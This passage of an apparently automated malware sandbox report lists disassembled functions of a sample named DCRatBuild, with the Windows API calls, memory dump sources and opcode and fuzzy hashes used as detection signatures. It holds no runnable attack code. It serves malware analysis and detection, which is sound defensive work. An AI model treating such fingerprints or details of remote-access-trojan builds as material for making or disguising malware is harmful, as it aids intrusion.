                      • Instruction Fuzzy Hash: B8D05B297181506BD6213778A8167FE1E068FC3710F0D816AB41D677C7EB474C8652F2
                      Function 00D79D7B Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GdipAlloc.GDIPLUS(00000010), ref: 00D79D81
                        • Part of subcall function 00D79B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00D79B30
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: Gdip$AllocBitmapCreateFromStream
                      • String ID:
                      • API String ID: 1915507550-0
                      • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                      • Instruction ID: 9e65e4e66285976bb9157a66cc91f037b0df3507596b97c63df611b6aa89c823
                      • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                      • Instruction Fuzzy Hash: 6ED0A73121820C7ADF50BA748C13A7AFBA8DB04310F00C065BC0CC6141FD71DE10A671
                      Function 00D69989 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                      Download Yara Rule
                      APIs
                      • GetFileType.KERNELBASE(000000FF,00D69887), ref: 00D69995
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: FileType
                      • String ID:
                      • API String ID: 3081899298-0
                      • Opcode ID: 7da1f3bba73b06e636cf38f669ffe530bdc6ba971ab68dd5d725faf2a147da90
                      • Instruction ID: f0930f5cb171996b8e9868c7f61c8344196abb386d7d4f61f3e42bd474ce8007
                      • Opcode Fuzzy Hash: 7da1f3bba73b06e636cf38f669ffe530bdc6ba971ab68dd5d725faf2a147da90
                      • Instruction Fuzzy Hash: 64D01231011280978F394A344D19099B755DB83366B3CE6AAD025C40A1D733C803F961
                      Function 00D7D41A Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00D7D43F
                        • Part of subcall function 00D7AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D7AC85
                        • Part of subcall function 00D7AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D7AC96
                        • Part of subcall function 00D7AC74: IsDialogMessageW.USER32(000103F6,?), ref: 00D7ACAA
                        • Part of subcall function 00D7AC74: TranslateMessage.USER32(?), ref: 00D7ACB8
                        • Part of subcall function 00D7AC74: DispatchMessageW.USER32(?), ref: 00D7ACC2
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: Message$DialogDispatchItemPeekSendTranslate
                      • String ID:
                      • API String ID: 897784432-0
                      • Opcode ID: 9e4d44fcaaf59a4fc2677b7a9f9bca4a899698e8f389f7ceb36f18536383ff7c
                      • Instruction ID: 43f9f5c236e4ce10a5ba1955825b7aa473c18cce8705a94b307421d9470d12ce
                      • Opcode Fuzzy Hash: 9e4d44fcaaf59a4fc2677b7a9f9bca4a899698e8f389f7ceb36f18536383ff7c
                      • Instruction Fuzzy Hash: 3AD09E31144301BBD6162B51DE06F1F7AA6EB88B04F004554B348B40B1C6A29D30AB36
                      Function 00D7D8DE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 17097ca10dccfe11fb623aab123b3a662397ae45425a9c9116f9a5d4fb46c0e7
                      • Instruction ID: faeed1a487a1b297fa3498ee99b62c840150134575a9eaa62191df963a14e128
                      • Opcode Fuzzy Hash: 17097ca10dccfe11fb623aab123b3a662397ae45425a9c9116f9a5d4fb46c0e7
                      • Instruction Fuzzy Hash: AEB012A226C2026C320871047D03E36162DCCC1B20330C01FF48FD12C0F4409C084432
                      Function 00D7D8C0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: f56e9e033de43fd96e1dc6f890bc2a6322e0d126cb7b80068437285263e7c648
                      • Instruction ID: 4f28a45d7a2a12902ed40103cdbc38f29fdb41ba3d523e016dad58509c972a62
                      • Opcode Fuzzy Hash: f56e9e033de43fd96e1dc6f890bc2a6322e0d126cb7b80068437285263e7c648
                      • Instruction Fuzzy Hash: 42B0129126C2426C324871047D03E36162DCCC0B20331C12FF04FD13C0F4409C8D4432
                      Function 00D7D8CA Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: b18906f7455baac357f4644615b6aebce14c0091c9de7d2c55a2629332b2fcd7
                      • Instruction ID: 5d01a11d8a0657f36c2dce196977f95d1f688d47d49c332676c7b8f24810f488
                      • Opcode Fuzzy Hash: b18906f7455baac357f4644615b6aebce14c0091c9de7d2c55a2629332b2fcd7
                      • Instruction Fuzzy Hash: B0B0129126C1026C320C75057E03E36162DCCC0B20330C02FF04FD13C0F4809C0E5432
                      Function 00D7D8F2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 77b49763e4ff6b6cdb2603ac421ec8b2300cebbf90faaa01aaa41ba5ea70bb7e
                      • Instruction ID: 68eb83d5e7565c800cf5e8088429162ee19d4a19986f0fa5096090b59dcfe65f
                      • Opcode Fuzzy Hash: 77b49763e4ff6b6cdb2603ac421ec8b2300cebbf90faaa01aaa41ba5ea70bb7e
                      • Instruction Fuzzy Hash: 02B012A126C1026C320C71057E03E36162DCCC0B20330C01FF08FD12C0F4809D094432
                      Function 00D7D8FC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 1a5a1117fa207f62043195f72682d3c70caad2e6159f44d9c8ccd54bfb3c252a
                      • Instruction ID: d5d31441835687fb5679566ff4d3971041bf051fbbe8b41ce962af2e07917c9c
                      • Opcode Fuzzy Hash: 1a5a1117fa207f62043195f72682d3c70caad2e6159f44d9c8ccd54bfb3c252a
                      • Instruction Fuzzy Hash: 03B012A126C1026C320C71057D03E36162DCCC0B20330C01FF08FD12C0F8409C084432
                      Function 00D7D8E8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: ddfd1637e0c781a85ff400d2b926c9127d77548f10d4b976e990d881a56b89de
                      • Instruction ID: abd5154eb1e5548aa04dce0be0428ec3a944ee08fc25e9a8e47234088a1d87db
                      • Opcode Fuzzy Hash: ddfd1637e0c781a85ff400d2b926c9127d77548f10d4b976e990d881a56b89de
                      • Instruction Fuzzy Hash: 2BB012A126C2026C324871047D03E36162DCCC0B20331C11FF08FD12C0F4409C484432
                      Function 00D7D891 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 3f2d0fb9711d414725142abe6fc6fc5930a981a6ae6c3e2fbd51e10e1cc167d5
                      • Instruction ID: b96fd5a7f21dfa1979fd2f99a04b456529428e819934c253f74d15c9578c5aac
                      • Opcode Fuzzy Hash: 3f2d0fb9711d414725142abe6fc6fc5930a981a6ae6c3e2fbd51e10e1cc167d5
                      • Instruction Fuzzy Hash: 07B0929526C3026C260821406952D3B1629CC80B20321852EB04EA0180A4409C488432
                      Function 00D7D8B6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: eb6409b9d2c68d991b6ee8d991fa645f27f6131135510094cc9c89479ae6a02f
                      • Instruction ID: 1aa383e5ba1583b737f6d686500e1192c5f2bc71b158ffc437c744dae50fd8df
                      • Opcode Fuzzy Hash: eb6409b9d2c68d991b6ee8d991fa645f27f6131135510094cc9c89479ae6a02f
                      • Instruction Fuzzy Hash: 8DB0129126C2026C320875047D03E36162DCCC1B20330C02FF44FD13C0F4409C0D4432
                      Function 00D7D8AC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 63918c3bd8acddcb8cec0eb48d184d76853c9b3a1261ecf16f3517ee4aca986d
                      • Instruction ID: ed04698555ac8498363a9f36f00b6475b9730dcf226ca70eb29901dcf4e718dc
                      • Opcode Fuzzy Hash: 63918c3bd8acddcb8cec0eb48d184d76853c9b3a1261ecf16f3517ee4aca986d
                      • Instruction Fuzzy Hash: 79B012D526C2026C320871447D43E3B162DDCC0B20330C01FF04FD12C0F8409C084532
                      Function 00D7E1F9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7E20B
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: cef9416160f9c2f7e40cb0cb9880023f0280aca8e69f3be06865ec40e29b7272
                      • Instruction ID: 170700ec1c2ed0b0a8fc870c739cbf6857911aeea6bd4cc45b7aae29dc580525
                      • Opcode Fuzzy Hash: cef9416160f9c2f7e40cb0cb9880023f0280aca8e69f3be06865ec40e29b7272
                      • Instruction Fuzzy Hash: A2B012D126E0027D330C11007F07E36032CCCC0B60330C01FF10ED4081B5808D095032
                      Function 00D7D942 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: a0fcdc4a00daa29cd72322474a8158eefd96676871ed02236011024222746058
                      • Instruction ID: 5dbc42b1651a11e6094f917cce065cd6688fbb72237c0aacbb0f3dbbc3b22480
                      • Opcode Fuzzy Hash: a0fcdc4a00daa29cd72322474a8158eefd96676871ed02236011024222746058
                      • Instruction Fuzzy Hash: 62B012E126C1026C320D71057E03E3616BDCCC0B20330C01FF04FD12C0F4809C094432
                      Function 00D7D910 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 7e1abbff093cfe63799c5e4351ac1e56b69087ca541d739879e9570221146738
                      • Instruction ID: 648a6bee2e9b95081b5a03cb6fa027a41c7734b59f722e6b19be2b353195a887
                      • Opcode Fuzzy Hash: 7e1abbff093cfe63799c5e4351ac1e56b69087ca541d739879e9570221146738
                      • Instruction Fuzzy Hash: E1B012A126D6026C324872047D03E36162FCCC0B20331C11FF04FD12C0F440DC484432
                      Function 00D7D906 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
